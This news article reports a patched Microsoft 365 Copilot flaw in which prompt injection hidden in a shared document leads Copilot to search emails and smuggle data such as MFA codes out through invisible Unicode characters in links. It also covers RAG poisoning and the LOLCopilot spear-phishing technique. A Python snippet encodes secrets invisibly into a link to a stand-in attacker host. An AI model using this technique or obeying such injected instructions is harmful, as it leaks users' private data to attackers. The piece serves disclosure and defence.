Microsoft Fixes ASCII Smuggling Flaw That Enabled Data Theft from Microsoft 365 Copilot

Aug 27, 2024 · Ravie Lakshmanan · AI Security / Vulnerability

Details have emerged about a now-patched vulnerability in Microsoft 365 Copilot that could enable the theft of sensitive user information using a technique called ASCII smuggling.

“ASCII Smuggling is a novel technique that uses special Unicode characters that mirror ASCII but are actually not visible in the user interface,” security researcher Johann Rehberger said.

“This means that an attacker can have the [large language model] render, to the user, invisible data, and embed them within clickable hyperlinks. This technique basically stages the data for exfiltration!”


The entire attack strings together a number of attack methods to fashion them into a reliable exploit chain. This involves the following steps –

  • Trigger prompt injection via malicious content concealed in a document shared over the chat
  • Using a prompt injection payload to instruct Copilot to search for additional emails and documents
  • Leveraging ASCII smuggling to entice the user into clicking on a link to exfiltrate valuable data to a third-party server
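The hiding step in the chain above relies on the Unicode Tags block (U+E0000–U+E007F), whose characters mirror ASCII one-for-one but render as zero-width in most user interfaces. A minimal sketch of the encoding (the attacker domain and secret below are hypothetical, not from the actual exploit):

```python
# ASCII smuggling sketch: map each ASCII character to its invisible
# counterpart in the Unicode Tags block by adding the 0xE0000 offset.
def smuggle(text: str) -> str:
    return "".join(chr(0xE0000 + ord(c)) for c in text)

def unsmuggle(hidden: str) -> str:
    return "".join(chr(ord(c) - 0xE0000) for c in hidden)

secret = "MFA code: 123456"          # hypothetical sensitive data
hidden = smuggle(secret)             # renders as nothing in most UIs

# Staged for exfiltration: the invisible payload rides along in the
# query string of an otherwise innocuous-looking clickable link.
link = f"https://attacker.example/?q={hidden}"
```

When the user clicks the link, the invisible characters travel with the request, and the attacker's server simply reverses the offset to recover the plaintext.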

The net result of the attack is that sensitive data present in emails, including multi-factor authentication (MFA) codes, could be transmitted to an adversary-controlled server. Microsoft has since addressed the issues following responsible disclosure in January 2024.

The development comes as proof-of-concept (PoC) attacks have been demonstrated against Microsoft's Copilot system to manipulate responses, exfiltrate private data, and dodge security protections, once again highlighting the need to monitor risks in artificial intelligence (AI) tools.

The methods, detailed by Zenity, allow malicious actors to perform retrieval-augmented generation (RAG) poisoning and indirect prompt injection leading to remote code execution attacks that can fully control Microsoft Copilot and other AI apps. In a hypothetical attack scenario, an external hacker with code execution capabilities could trick Copilot into serving users phishing pages.


Perhaps one of the most novel attacks is the ability to turn the AI into a spear-phishing machine. The red-teaming technique, dubbed LOLCopilot, allows an attacker with access to a victim's email account to send phishing messages mimicking the compromised user's style.

Microsoft has also acknowledged that publicly exposed Copilot bots created using Microsoft Copilot Studio and lacking any authentication protections could be an avenue for threat actors to extract sensitive information, assuming they have prior knowledge of the Copilot name or URL.

“Enterprises should evaluate their risk tolerance and exposure to prevent data leaks from Copilots (formerly Power Virtual Agents), and enable Data Loss Prevention and other security controls accordingly to control creation and publication of Copilots,” Rehberger said.
